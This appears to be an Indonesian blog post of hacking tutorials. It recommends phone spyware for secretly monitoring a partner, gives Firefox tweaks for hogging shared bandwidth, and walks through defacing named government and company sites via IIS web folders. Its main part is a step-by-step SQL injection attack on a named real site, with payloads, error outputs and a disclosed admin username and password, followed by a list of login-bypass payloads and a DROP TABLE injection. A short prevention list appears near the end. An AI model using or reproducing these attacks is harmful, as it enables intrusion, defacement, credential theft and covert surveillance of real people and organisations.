Senin, 09 Mei 2011

HACKING, DEFACE, SQL INJECTION (SCRIPT)

Tau gak... 
apa sieh Hacking, deface , sql injection (script)????
contoh - contoh nya??

Hacking
Hacking adalah kegiatan menerobos program komputer milik orang/pihak lain. Hacker adalah orang yang gemar ngoprek komputer, memiliki keahlian membuat dan membaca program tertentu, dan terobsesi mengamati keamanan (security)-nya. “Hacker” memiliki wajah ganda; ada yang budiman ada yang pencoleng. “Hacker” budiman memberi tahu kepada programer yang komputernya diterobos, akan adanya kelemahan-kelemahan pada program yang dibuat, sehingga bisa “bocor”, agar segera diperbaiki. Sedangkan, hacker pencoleng, menerobos program orang lain untuk merusak dan mencuri datanya.

permisi ya gua mau share nih.. oke dah langsung aj....
mungkin ini cara lma tapi masih bagus kok silahkan di coba...


pertmaxx software nya lo download dlo di Sini
Download 
terus kalian buka deh tuh software`a jangan di buang ya
lo buka Easy WIFI Radar 1.0.5v Installer.exenya
abis itu lo instal deh software`a
setelah udah buka Easy WiFi Radar nya
gampang kan??
setelah ketemu lo buka deh....
monggo di coba....


Hacking Hp
software ini tinggal di instal di hp yang ingin anda rekam aktifitasnnya
smua aktifitas tombol terkam di sini biar pun seperti sms n pangilan masuk sudah di hapus namun tetep terekam disni n bisa di sembunyikan sangat beguna bagi kalian yang mempunyai pacar tinggal dinstal diam" dan protec pake paswor pasangan kita tidak akan menyadari kalau hp nya sedang di monitoring
download
 
Monopoli Bandwhit Biar Koneksi Internet Kita Semakin Cepat
Teman2 prnah ga ngersa klo lgi koneksi tersa amt lambt bgt??
knp ci bsa lambt??  karena birate'na kta trbatsi
tpi da solusinya...
biar dowmnload smkin cpet, trus koneksi smkin ngacir..
1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : about:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan [/b]NEW>>INTEGER[/b]
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : about:BLANK
Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :link
atau :link
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
-- Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
-- Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
-- Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT

Klik 2x di settingan dan masukin angka-angka ini - untuk true / false booleans – mereka bakal ganti otomatis begitu klik 2x

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 64
network.http.max-connections-per-server – 20
network.http.max-persistent-connections-per-proxy – 10
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
network.http.request.max-start-delay = 0
nglayout.initialpaint.delay = 0
If nglayout.initialpaint.delay doesnt exist, Right click, new integer.

Optional:

Code:

network.http.max-persistent-connections-per-proxy = 10
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0

Tutup mozilla trus jalanin lagi.

Sekarang Mozilla lo mengGILAAAAAAAAAA!!!.

WARNING:

Settingan ini bikin lo ngedonlot situs dengan amat KESURUPAN, BUT bikin Overload luar biasa ke situs yang lo tuju!
Ga bermaksud apa-apa selain kompi lain yang dapat share internet bakal lemod ABEZZZ gara-gara lo sedot benwidnya!

Next tip:

Disable IPv6 di Firefox buat bikin sejuk kecepatan load page lo!!........ soalnya hamper semua site dah ga make IPv4...........
Buka Firefox.........ketik “about:config” (enter)

cari :Network.dns.disableIPv6
Klik 2x buat ngerubah jadi 'true' trus restart Firefox.

Lo bakal mempercepat akses browsing.........page per page.
Sekarang Firefox bener-bener dah GILAAAAAAAA buat lo!...
nglayout.initialpaint.delay bisa dirubah yg mana aja...bisa 0 bisa 300 ada juga yg set 30...tergantung kebutuhan.....coba 0 dulu...baru nanti kl ga ada perubahan naikan ke 300 atau nilai yg dirasa memuaskan

For ADSL:

Code:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true


3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves. (Copy from TvM)[/code]


For Dial_ip:

Code:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true

DEFACE HALAMAN WEB DENGAN MENGGUNAKAN
WEB FOLDER
Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :
www.bandaaceh.go.id
www.pertamina.co.id
www.transtv.co.id
www.setkab.go.id
www.pom.go.id
www.usni.ac.id
Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.
Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini penulis menggunakan contoh penggunaan web folder pada Windows 98
1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain
2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web
3. Buka My computer pada desktop dan lihat icon web folder
4. Klik 2 kali pada icon web folder tersebut
5. klik 2 kali pada icon add web folder
6. Isikan URL target di popup yang muncul misalkan target kita adalah
www.pertamina.co.id maka isikan URL tersebut
7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut
9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.
10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat
11. Save di komputer anda.
12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para hacking yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web site
yang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.



SQL Injection, step by step
SQL injection adalah kode injeksi teknik yang mengeksploitasi kerentanan keamanan yang terjadi di database lapisan suatu aplikasi . kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk string literal karakter melarikan diri tertanam di SQL laporan atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi.. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL. [1]

/*********************************************************
 * SQL Injection, step by step.
 *
 * No Warranty. This tutorial is for educational use only,
 * commercial use is prohibited.
 *
 **********************************************************/
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?

Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id

Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject

dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.

Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,

beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :

' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.


Berikut adalah pesan error yang terjadi, jika kita mengecek

field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !!   -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-

field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :

' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :

' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di : ' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a' dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :

' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :

www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba, Atau kita pakai jalan pintas saja....

Kita inject-kan :

' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita,
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :

www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan

pengetahuan anda. Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack

oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************

KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
    cara membatasinya di kode program, jadi si cracker pemula
    akan bingung sejenak melihat input box nya gak bisa di
    inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
    tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
    dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
    Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
    di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan.....

Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!! Just kidding )
Referensi :

[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url. Biasa Sql Injection dilakukan pada login page pada asp seperti di :
adminlogin.asp
login.asp 
Jadi yang akan menjadi target itu page tersebut , sekarang kita mulai aja dengan dasar-dasar sql injection :d. Biasanya di sql statment select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = ‘echo’ and password=’password’
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browserServer: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near ‘jopi’ SQL atau “Structured Query Language” seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote ‘breaks out’
dari delimiter nya SQL Jadi kalau misal ada inputan User: echo’;drop table user– dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya, oh iya ‘–’ merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya ‘login’ dan ‘pass’. dan SQL nya di asp: var sql = select * from users where username=’”+login+”‘ and password=’”+pass”‘”;
coba kalau ada inputan: login: ‘;drop table users– pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita langsung praktek aja. Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
adminlogin.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:’ or 1=1–
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:’ or 1=1–
admin:’ or 1=1–
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test’1=1–
menjadi http://victim/index.asp?id=test’1=1–
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
<FORM action=http://victim/admin/login.asp method=post>
<input type=hidden name=A value=”test’ or 1=1–”>
</FORM>
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username  ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ‘ or 1=1– Mungkin pada bertanya-tanya kenapa mengunakan variable ‘or 1=1– dan sangat penting.Lihat contoh pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request(”category”)
sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory=’laptop’
lalu apa hub dengan ‘or 1=1—
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop’or 1=1–
Kita lihat varible v_cat sekarang menjadi laptop’or 1=1– lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory=’laptop’ or 1=1–’
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda — merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’=’a
” or “a”=”a
‘) or (’a’=’a
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (’x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (’a’=’a
“) or (”a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (’a’=’a
hi”) or (”a”=”a
Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .

Tidak ada komentar:

Posting Komentar